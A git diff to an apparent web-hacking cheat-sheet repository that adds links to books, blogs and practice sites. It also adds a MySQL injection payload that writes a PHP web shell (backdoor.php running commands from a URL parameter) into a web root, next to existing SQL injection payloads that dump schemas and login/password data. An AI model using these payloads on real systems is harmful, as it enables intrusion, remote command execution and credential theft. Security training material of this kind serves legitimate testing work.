diff --git a/README.md b/README.md
index b2eb516..a04d18f 100644
--- a/README.md
+++ b/README.md
@@ -26,12 +26,28 @@ Last modifications :
 
 # More resources
 Book's list:
-* Web Hacking 101 - https://leanpub.com/web-hacking-101
-* The Web Application Hacker's Handbook - https://www.amazon.fr/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470  
+* [Web Hacking 101](https://leanpub.com/web-hacking-101)
+* [The Web Application Hacker's Handbook](https://www.amazon.fr/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470)  
+* [OWASP Testing Guide v4](https://www.owasp.org/index.php/OWASP_Testing_Project)
+* [Penetration Testing: A Hands-On Introduction to Hacking](http://amzn.to/2dhHTSn)
+* [The Hacker Playbook 2: Practical Guide to Penetration Testing](http://amzn.to/2d9wYKa)
+* [The Mobile Application Hacker’s Handbook](http://amzn.to/2cVOIrE)
 
 Blogs/Websites
 * http://blog.zsec.uk/101-web-testing-tooling/
 * https://blog.innerht.ml
 * https://blog.zsec.uk
 * https://www.exploit-db.com/google-hacking-database
-* https://www.arneswinnen.net
\ No newline at end of file
+* https://www.arneswinnen.net
+* https://forum.bugcrowd.com/t/researcher-resources-how-to-become-a-bug-bounty-hunter/1102
+
+Practice
+* [Root-Me](https://www.root-me.org)
+* [Zenk-Security](https://www.zenk-security.com/epreuves.php)
+* [W3Challs](https://w3challs.com/)
+* [NewbieContest](https://www.newbiecontest.org/)
+* [Vulnhub](https://www.vulnhub.com/)
+* [The Cryptopals Crypto Challenges](https://cryptopals.com/)
+* [Penetration Testing Practice Labs](http://www.amanhardikar.com/mindmaps/Practice.html)
+* [alert(1) to win](https://alf.nu/alert1)
+* [Hacksplaining](https://www.hacksplaining.com/exercises)
\ No newline at end of file
diff --git a/SQL injection/MySQL Injection.md b/SQL injection/MySQL Injection.md
index dcecf3d..8ed4d4a 100644
--- a/SQL injection/MySQL Injection.md	
+++ b/SQL injection/MySQL Injection.md	
@@ -56,4 +56,9 @@ AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
 ```
 (select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#
 (select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)#
+```
+
+##MYSQL DROP SHELL
+```
+SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
 ```
\ No newline at end of file
diff --git a/SQL injection/README.md b/SQL injection/README.md
index 93473cf..ab2b084 100644
--- a/SQL injection/README.md	
+++ b/SQL injection/README.md	
@@ -284,6 +284,7 @@ mysql> mysql> select version();
   - [PentestMonkey's mySQL injection cheat sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
   - [Reiners mySQL injection Filter Evasion Cheatsheet] (https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
   - [Alternative for Information_Schema.Tables in MySQL](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/)
+  - [The SQL Injection Knowledge base](https://websec.ca/kb/sql_injection)
 * MSQQL:
   - [EvilSQL's Error/Union/Blind MSSQL Cheatsheet] (http://evilsql.com/main/page2.php)
   - [PentestMonkey's MSSQL SQLi injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)